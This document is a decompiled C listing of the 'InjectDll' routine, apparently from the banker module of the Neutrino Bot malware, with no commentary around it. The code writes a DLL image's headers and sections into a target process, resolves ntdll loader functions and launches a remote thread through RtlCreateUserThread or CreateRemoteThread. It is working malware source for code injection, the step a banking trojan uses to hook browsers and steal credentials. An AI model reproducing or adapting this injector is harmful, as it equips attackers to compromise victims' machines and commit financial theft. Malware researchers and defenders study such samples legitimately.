InjectDll from banker module from Neutrino Bot (2018/08/27)

1. char __cdecl InjectDll(HANDLE hProcess, LPCVOID lpAddress)
2. {
3.   __int64 v3; // rax
4.   __int64 v4; // rax
5.   __int64 v5; // kr00_8
6.   __int64 v6; // rax
7.   _DWORD *v7; // edx
8.   __int64 v8; // rax
9.   __int64 v9; // rax
10.   __int64 v10; // rax
11.   __int64 v11; // rax
12.   __int64 v12; // rax
13.   HMODULE v13; // eax
14.   FARPROC v14; // [esp+Ch] [ebp-29Ch]
15.   FARPROC v15; // [esp+10h] [ebp-298h]
16.   FARPROC v16; // [esp+14h] [ebp-294h]
17.   FARPROC v17; // [esp+18h] [ebp-290h]
18.   __int64 v18; // [esp+1Ch] [ebp-28Ch]
19.   __int64 v19; // [esp+24h] [ebp-284h]
20.   __int64 v20; // [esp+2Ch] [ebp-27Ch]
21.   __int64 v21; // [esp+34h] [ebp-274h]
22.   LPCVOID v22; // [esp+3Ch] [ebp-26Ch]
23.   bool v23; // [esp+43h] [ebp-265h]
24.   struct _MEMORY_BASIC_INFORMATION v24; // [esp+44h] [ebp-264h]
25.   SIZE_T v25; // [esp+60h] [ebp-248h]
26.   bool v26; // [esp+67h] [ebp-241h]
27.   struct _MEMORY_BASIC_INFORMATION v27; // [esp+68h] [ebp-240h]
28.   SIZE_T v28; // [esp+84h] [ebp-224h]
29.   bool v29; // [esp+8Bh] [ebp-21Dh]
30.   struct _MEMORY_BASIC_INFORMATION v30; // [esp+8Ch] [ebp-21Ch]
31.   SIZE_T v31; // [esp+A8h] [ebp-200h]
32.   unsigned int v32; // [esp+ACh] [ebp-1FCh]
33.   char *v33; // [esp+B0h] [ebp-1F8h]
34.   unsigned int v34; // [esp+B4h] [ebp-1F4h]
35.   void *v35; // [esp+B8h] [ebp-1F0h]
36.   char v36; // [esp+BFh] [ebp-1E9h]
37.   struct _MEMORY_BASIC_INFORMATION Buffer; // [esp+C0h] [ebp-1E8h]
38.   SIZE_T v38; // [esp+DCh] [ebp-1CCh]
39.   char v39; // [esp+E0h] [ebp-1C8h]
40.   HANDLE v40; // [esp+E8h] [ebp-1C0h]
41.   int v41; // [esp+ECh] [ebp-1BCh]
42.   FARPROC v42; // [esp+F0h] [ebp-1B8h]
43.   unsigned __int16 j; // [esp+F4h] [ebp-1B4h]
44.   struct _OSVERSIONINFOW VersionInformation; // [esp+F8h] [ebp-1B0h]
45.   LPCVOID lpBuffer; // [esp+218h] [ebp-90h]
46.   unsigned int i; // [esp+21Ch] [ebp-8Ch]
47.   __int64 v47; // [esp+220h] [ebp-88h]
48.   __int64 hObject; // [esp+238h] [ebp-70h]
49.   LPCVOID v49; // [esp+244h] [ebp-64h]
50.   __int64 hModule; // [esp+248h] [ebp-60h]
51.   char *v51; // [esp+250h] [ebp-58h]
52.   DWORD flOldProtect; // [esp+254h] [ebp-54h]
53.   int v53; // [esp+258h] [ebp-50h]
54.   int v54; // [esp+25Ch] [ebp-4Ch]
55.   char v55; // [esp+267h] [ebp-41h]
56.   __int64 v56; // [esp+268h] [ebp-40h]
57.   unsigned __int16 *v57; // [esp+270h] [ebp-38h]
58.   bool v58; // [esp+277h] [ebp-31h]
59.   _DWORD *v59; // [esp+278h] [ebp-30h]
60.   char v60; // [esp+27Fh] [ebp-29h]
61.   __int64 nSize; // [esp+280h] [ebp-28h]
62.   LPCVOID v62; // [esp+28Ch] [ebp-1Ch]
63.   char *v63; // [esp+290h] [ebp-18h]
64.   char *v64; // [esp+294h] [ebp-14h]
65.   __int64 lpBaseAddress; // [esp+298h] [ebp-10h]
66.   __int64 lpParameter; // [esp+2A0h] [ebp-8h]
67.  
68.   v60 = 0;
69.   v55 = 0;
70.   v58 = 0;
71.   flOldProtect = 0;
72.   hModule = 0i64;
73.   v53 = 0;
74.   v54 = 0;
75.   lpBaseAddress = 0i64;
76.   lpParameter = 0i64;
77.   v56 = 0i64;
78.   nSize = 0i64;
79.   v62 = 0;
80.   if ( !hProcess )
81.     return v60;
82.   v38 = VirtualQuery(lpAddress, &Buffer, 0x1Cu);
83.   if ( v38 )
84.     v36 = Buffer.Protect & 1 ? 0 : (Buffer.Protect & 0x100) == 0;
85.   else
86.     v36 = 0;
87.   if ( !v36 )
88.     return v60;
89.   v59 = lpAddress;
90.   if ( *(_WORD *)lpAddress != 23117 )
91.     return 0;
92.   v57 = (unsigned __int16 *)((char *)lpAddress + v59[15] + 4);
93.   if ( *v57 == 34404 )
94.     v55 = 1;
95.   if ( v55 )
96.   {
97.     sub_10001000();
98.     v56 = 1088i64;
99.     nSize = 56i64;
100.     v34 = 1088;
101.     v35 = VirtualAlloc(0, 0x441u, 0x3000u, 4u);
102.     if ( v35 && v35 && &unk_10025530 && v34 )
103.       qmemcpy(v35, &unk_10025530, v34);
104.     v62 = v35;
105.     v51 = (char *)lpAddress + v59[15];
106.     LODWORD(v3) = sub_10001B70(hProcess, 0, 0, *((_DWORD *)v51 + 20), 12288, 64);
107.     lpBaseAddress = v3;
108.     LODWORD(v4) = sub_10001B70(hProcess, 0, 0, nSize + v56, 12288, 64);
109.     lpParameter = v4;
110.   }
111.   else
112.   {
113.     v56 = 13839i64;
114.     nSize = 28i64;
115.     v32 = 13839;
116.     v33 = (char *)VirtualAlloc(0, 0x3610u, 0x3000u, 4u);
117.     if ( v33 && v33 && "éá" && v32 )
118.       qmemcpy(v33, "éá", v32);
119.     v62 = v33;
120.     v64 = (char *)lpAddress + v59[15];
121.     lpBaseAddress = (signed int)VirtualAllocEx(hProcess, 0, *((_DWORD *)v64 + 20), 0x3000u, 0x40u);
122.     lpParameter = (signed int)VirtualAllocEx(hProcess, 0, nSize + v56, 0x3000u, 0x40u);
123.   }
124.   if ( !lpBaseAddress || !lpParameter )
125.     return 0;
126.   v63 = 0;
127.   if ( v55 )
128.   {
129.     v63 = v51 + 264;
130.     if ( !sub_10001D20(hProcess, lpBaseAddress, HIDWORD(lpBaseAddress), lpAddress, *((_DWORD *)v51 + 21), 0) )
131.       return 0;
132.     for ( i = 0; i < *((unsigned __int16 *)v51 + 3); ++i )
133.     {
134.       if ( *(_DWORD *)&v63[40 * i + 16] )
135.       {
136.         v5 = lpBaseAddress + *(unsigned int *)&v63[40 * i + 12];
137.         if ( !sub_10001D20(
138.                 hProcess,
139.                 v5,
140.                 HIDWORD(v5),
141.                 (char *)lpAddress + *(_DWORD *)&v63[40 * i + 20],
142.                 *(_DWORD *)&v63[40 * i + 16],
143.                 0) )
144.           return 0;
145.       }
146.     }
147.     v49 = (LPCVOID)sub_10013750(56);
148.     v31 = VirtualQuery(v49, &v30, 0x1Cu);
149.     if ( v31 )
150.     {
151.       if ( v30.Protect & 1 )
152.         v29 = 0;
153.       else
154.         v29 = (v30.Protect & 0x100) == 0;
155.     }
156.     else
157.     {
158.       v29 = 0;
159.     }
160.     if ( !v29 )
161.       return 0;
162.     LODWORD(v6) = sub_10001390(L"ntdll.dll");
163.     hModule = v6;
164.     if ( !v6 )
165.       return 0;
166.     v7 = v49;
167.     *(_DWORD *)v49 = lpBaseAddress;
168.     v7[1] = HIDWORD(lpBaseAddress);
169.     *((_QWORD *)v49 + 1) = lpBaseAddress + *((unsigned int *)v51 + 44);
170.     *((_QWORD *)v49 + 2) = lpBaseAddress + *((unsigned int *)v51 + 36);
171.     LODWORD(v8) = sub_10001AB0(hModule, SHIDWORD(hModule), "LdrLoadDll");
172.     v21 = v8;
173.     LODWORD(v8) = v49;
174.     *((_DWORD *)v49 + 6) = v21;
175.     *(_DWORD *)(v8 + 28) = HIDWORD(v21);
176.     if ( !v21 )
177.       return 0;
178.     LODWORD(v9) = sub_10001AB0(hModule, SHIDWORD(hModule), "LdrGetProcedureAddress");
179.     v20 = v9;
180.     LODWORD(v9) = v49;
181.     *((_DWORD *)v49 + 8) = v20;
182.     *(_DWORD *)(v9 + 36) = HIDWORD(v20);
183.     if ( !v20 )
184.       return 0;
185.     LODWORD(v10) = sub_10001AB0(hModule, SHIDWORD(hModule), "RtlInitAnsiString");
186.     v19 = v10;
187.     LODWORD(v10) = v49;
188.     *((_DWORD *)v49 + 10) = v19;
189.     *(_DWORD *)(v10 + 44) = HIDWORD(v19);
190.     if ( !v19 )
191.       return 0;
192.     LODWORD(v11) = sub_10001AB0(hModule, SHIDWORD(hModule), "RtlCreateUnicodeStringFromAsciiz");
193.     v18 = v11;
194.     LODWORD(v11) = v49;
195.     *((_DWORD *)v49 + 12) = v18;
196.     *(_DWORD *)(v11 + 52) = HIDWORD(v18);
197.     if ( !v18 )
198.       return 0;
199.     if ( !sub_10001D20(hProcess, lpParameter, HIDWORD(lpParameter), v49, nSize, 0) )
200.       return 0;
201.     if ( !sub_10001D20(hProcess, nSize + lpParameter, (unsigned __int64)(nSize + lpParameter) >> 32, v62, v56, 0) )
202.       return 0;
203.     v58 = sub_10001C50(hProcess, lpParameter, HIDWORD(lpParameter), 28, 32, &flOldProtect) != 0;
204.     LODWORD(v12) = sub_10001AB0(hModule, SHIDWORD(hModule), "RtlCreateUserThread");
205.     v47 = v12;
206.     if ( !v12 )
207.       return 0;
208.     if ( (signed int)sub_10001040(v47, SHIDWORD(v47), 10) >= 0 && hObject )
209.       CloseHandle((HANDLE)hObject);
210.   }
211.   else
212.   {
213.     v63 = v64 + 248;
214.     if ( !WriteProcessMemory(hProcess, (LPVOID)lpBaseAddress, lpAddress, *((_DWORD *)v64 + 21), 0) )
215.       return 0;
216.     for ( j = 0; j < (signed int)*((unsigned __int16 *)v64 + 3); ++j )
217.     {
218.       if ( *(_DWORD *)&v63[40 * j + 16]
219.         && !WriteProcessMemory(
220.               hProcess,
221.               (LPVOID)(*(_DWORD *)&v63[40 * j + 12] + lpBaseAddress),
222.               (char *)lpAddress + *(_DWORD *)&v63[40 * j + 20],
223.               *(_DWORD *)&v63[40 * j + 16],
224.               0) )
225.       {
226.         return 0;
227.       }
228.     }
229.     lpBuffer = (LPCVOID)sub_10013750(28);
230.     v28 = VirtualQuery(lpBuffer, &v27, 0x1Cu);
231.     if ( v28 )
232.     {
233.       if ( v27.Protect & 1 )
234.         v26 = 0;
235.       else
236.         v26 = (v27.Protect & 0x100) == 0;
237.     }
238.     else
239.     {
240.       v26 = 0;
241.     }
242.     if ( !v26 )
243.       return 0;
244.     v13 = GetModuleHandleW(L"ntdll.dll");
245.     hModule = (signed int)v13;
246.     if ( !v13 )
247.       return 0;
248.     *(_DWORD *)lpBuffer = lpBaseAddress;
249.     *((_DWORD *)lpBuffer + 1) = lpBaseAddress + *((_DWORD *)v64 + 40);
250.     *((_DWORD *)lpBuffer + 2) = lpBaseAddress + *((_DWORD *)v64 + 32);
251.     v17 = GetProcAddress((HMODULE)hModule, "LdrLoadDll");
252.     *((_DWORD *)lpBuffer + 3) = v17;
253.     if ( !v17 )
254.       return 0;
255.     v16 = GetProcAddress((HMODULE)hModule, "LdrGetProcedureAddress");
256.     *((_DWORD *)lpBuffer + 4) = v16;
257.     if ( !v16 )
258.       return 0;
259.     v15 = GetProcAddress((HMODULE)hModule, "RtlInitAnsiString");
260.     *((_DWORD *)lpBuffer + 5) = v15;
261.     if ( !v15 )
262.       return 0;
263.     v14 = GetProcAddress((HMODULE)hModule, "RtlCreateUnicodeStringFromAsciiz");
264.     *((_DWORD *)lpBuffer + 6) = v14;
265.     if ( !v14 )
266.       return 0;
267.     if ( !WriteProcessMemory(hProcess, (LPVOID)lpParameter, lpBuffer, nSize, 0) )
268.       return 0;
269.     if ( !WriteProcessMemory(hProcess, (LPVOID)(nSize + lpParameter), v62, v56, 0) )
270.       return 0;
271.     v58 = VirtualProtectEx(hProcess, (LPVOID)lpParameter, 0x1Cu, 0x20u, &flOldProtect) != 0;
272.     v22 = &VersionInformation;
273.     v25 = VirtualQuery(&VersionInformation, &v24, 0x1Cu);
274.     if ( v25 )
275.     {
276.       if ( v24.Protect & 1 )
277.         v23 = 0;
278.       else
279.         v23 = (v24.Protect & 0x100) == 0;
280.     }
281.     else
282.     {
283.       v23 = 0;
284.     }
285.     if ( v23 )
286.       memset((void *)v22, 0, 0x9Cu);
287.     VersionInformation.dwOSVersionInfoSize = 284;
288.     GetVersionExW(&VersionInformation);
289.     if ( VersionInformation.dwMajorVersion > 5 )
290.     {
291.       v42 = GetProcAddress((HMODULE)hModule, "RtlCreateUserThread");
292.       v41 = ((int (__cdecl *)(HANDLE, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, HANDLE *, char *))v42)(
293.               hProcess,
294.               0,
295.               0,
296.               0,
297.               0,
298.               0,
299.               nSize + lpParameter,
300.               lpParameter,
301.               &v40,
302.               &v39);
303.       if ( v41 < 0 )
304.         return 0;
305.       if ( v40 )
306.         CloseHandle(v40);
307.     }
308.     else if ( !CreateRemoteThread(
309.                  hProcess,
310.                  0,
311.                  0,
312.                  (LPTHREAD_START_ROUTINE)(nSize + lpParameter),
313.                  (LPVOID)lpParameter,
314.                  0,
315.                  0) )
316.     {
317.       return 0;
318.     }
319.   }
320.   return 1;
321. }